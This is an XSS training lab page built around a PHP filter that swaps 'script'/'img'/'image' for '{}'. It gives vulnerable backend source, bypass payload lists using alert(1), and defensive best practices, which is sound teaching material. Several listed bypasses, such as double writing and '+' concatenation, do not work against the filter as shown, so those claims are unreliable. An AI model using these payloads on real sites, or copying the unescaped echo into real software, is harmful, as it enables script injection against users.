KrazePlanetLabs - Curly Brace Filtering XSS Lab

Curly Brace Filtering Challenge

Lab Overview

This lab demonstrates a unique filtering approach where blocked tags are replaced with curly braces {}, creating interesting transformation challenges for XSS testing.

Curly Brace Transformation: The application replaces blocked tags ('script', 'img', 'image') with '{}' characters.

Hidden Parameters: There are multiple hidden parameters not shown in the main form. Use tools like Arjun to discover them!

# use arjun tool to find hidden parameter

Curly Brace Filter: Replaces blocked tags with '{}'

Blocked tags:

Filter method: str_replace(array('script','img','image'), '{}', $_GET['hidden'])

Filter Transformations:

Input Example	After Filter	Transformation
`<script>alert(1)</script>`	`<{}>alert(1)</{}>`	'script' → '{}'
`<img src=x onerror=alert(1)>`	`<{} src=x onerror=alert(1)>`	'img' → '{}'
`<image src=x onerror=alert(1)>`	`<{} src=x onerror=alert(1)>`	'image' → '{}'

Filter Complexity: Curly Brace Transformation

Objective: Test XSS payloads against the curly brace filter and find ways to exploit the transformation to execute JavaScript.

Backend Source Code

if(isset($_GET["fname"]) && isset($_GET["lname"])){
    echo htmlspecialchars($_GET["fname"], ENT_QUOTES);
    echo htmlspecialchars($_GET["lname"], ENT_QUOTES);
}
elseif(isset($_GET["categoryid"])){
    echo htmlspecialchars($_GET["categoryid"], ENT_QUOTES);
}
elseif(isset($_GET["hidden"])){
    $arr = array('script','img','image');
    $re = str_replace($arr, '{}', $_GET['hidden']);
    echo $re;
}
# use arjun tool to find hidden parameter

Test Input Forms

Visible Parameters (HTML Encoded)

Hidden Parameters

Hint: The 'categoryid' and 'hidden' parameters are not shown in the main form but are implemented in the backend.

Curly Brace Filter Bypass Techniques

Case Variation Bypasses:

<SCRIPT>alert(1)</SCRIPT> - Uppercase
<Script>alert(1)</Script> - Capitalized
<ScRiPt>alert(1)</ScRiPt> - Mixed case

Alternative Tag Vectors:

<svg onload=alert(1)> - SVG tag
<body onload=alert(1)> - Body tag
<iframe src="javascript:alert(1)"> - Iframe with JS protocol
<object data="javascript:alert(1)"> - Object tag

Curly Brace Exploitation Techniques:

Double writing: <scrscriptipt>alert(1)</scrscriptipt>
Nested tags: <scr<script>ipt>alert(1)</scr<script>ipt>
Exploit transformation: Create payloads where '{}' creates valid syntax
Example: <{}>alert(1)</{}> might work in specific contexts
String concatenation: <scr"+"ipt>alert(1)</scr"+"ipt>

Security Implications

Curly brace filtering demonstrates:

Tag replacement filters are easily bypassed with case variations
Curly braces might create valid syntax in certain contexts
Alternative HTML tags provide numerous XSS vectors
Simple string replacement is insufficient for security
Transformation filters can sometimes be exploited
Proper output encoding is the only reliable defense

Best Practices

For secure web applications:

Use context-aware output encoding, not tag filtering
Implement strict Content Security Policy (CSP) headers
Validate input using strict whitelists, not blacklists
Use modern sanitization libraries (DOMPurify, etc.)
Avoid transformation filters that can be exploited
Conduct comprehensive security testing
Use security headers: X-XSS-Protection, X-Content-Type-Options

Payload Examples for Curly Brace Filter

Case Variation Payloads:

<SCRIPT>alert(1)</SCRIPT>
<Script>alert(1)</Script>
<ScRiPt>alert(1)</ScRiPt>

Alternative Tag Payloads:

<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
<object data="javascript:alert(1)">

Creative Exploitation Payloads:

<scrscriptipt>alert(1)</scrscriptipt> - Double writing
<scr{}ipt>alert(1)</scr{}ipt> - Using the curly braces
<scr"+"ipt>alert(1)</scr"+"ipt> - String concatenation
javascript:alert(1) - JavaScript protocol